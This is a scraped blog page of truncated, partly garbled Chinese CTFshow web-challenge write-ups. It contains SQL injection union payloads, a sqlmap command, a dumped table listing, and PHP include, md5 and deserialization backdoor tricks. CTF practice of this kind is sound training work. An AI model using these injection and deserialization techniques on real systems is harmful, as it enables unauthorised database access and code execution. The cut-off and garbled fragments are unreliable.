web211//拼接sql语句查找指定ID用户 $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;"; //对查询字符进行解密 function decode($id){ return strrev(base64_decode(strrev(base64_decode($id))); } function waf($str){ return preg_match('/ /', $str);...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....
web 211 python sqlmap.py -u http://ba7627ab-1729-41f3-ab5c-5d23b4e81ea9.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --headers="Content-Type:text/plain" --cookie="PHPSESSID=1l29h3j38np2o554gj7rpmg8n6;" --safe-url="http://ba7627ab-1729-41f3-ab5c-5d2...
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]} 1.payload2: make_payload("select * from ctfshow_flagasa;"){"code...
CTFshow PHP web91 先解释一下 preg_match(‘/^php 和 表示匹配大小写, 表示多行匹配, 行首 元字符 仅匹配字符串的开始位置 , 而 行末 元字符 /im′,a)和pregmatch(′/phpa)/i表示匹配大小写,/m表示多行匹配,"行首"元字符()仅匹配字符串的开始位置∗∗,∗∗而"行末"元字符(/im’, a ) ...
1.读代码,读懂题目 打开靶机,显示页面信息,为php代码 通读代码可以得知: 当URL处get方式传参,输入v1、v2两个参数,当v1的值全部为字母,v2的值全部为数字,当v1与v2输入值的md5值相同时,输出flag,没有输入值的情况下,输出“where is flag”,现在页面的最上方也有该
1. CTFshow WEB入门1-20(信息搜集)经验总结(595) 2. CTFshow 萌新计划web1-8(578) 3. CTFshow 萌新计划web9-15(454) 4. CTFshow WEB入门37(283) 5. CTFshow WEB入门151(280) 评论排行榜 1. CTFshow WEB入门151(2) 最新评论 1. Re:CTFshow WEB入门151 @ccccttttffff 蚁剑连接后,左侧会有如...
web39 <?phperror_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){include($c.".php");}}else{highlight_file(__FILE__);} 这题的意思就是直接在我们的最后添加一个.php 我们可以直接使用上面的代码执行,执行结束之后直接添加.php也不影响执行 ...
WEB257 首先,我们知道__construct()函数会被new调用,所以这里我们可以修改其调用的函数,修改至backDoor().并修改$code的值来进行反序列化攻击。 所以,这里我们仅需要保证username和password不为空就够执行该后门了(后面我又发现当cat flag.php时不被执行,所以利用tac进行绕过) ...
ctfshow web web1 打开过后发现只有图中的一句话 直接查看页面源代码,发现一串MD5加密的东西 直接解码即可 __EOF__ 本文作者蝴蝶 https://www.cnblogs.com/vegetables-hudie/p/15177830.html 许可协议。转载请注明出处! :如果您觉得文章对您有帮助,可以点击文章右下角一下。您的鼓励是博主的最大动力!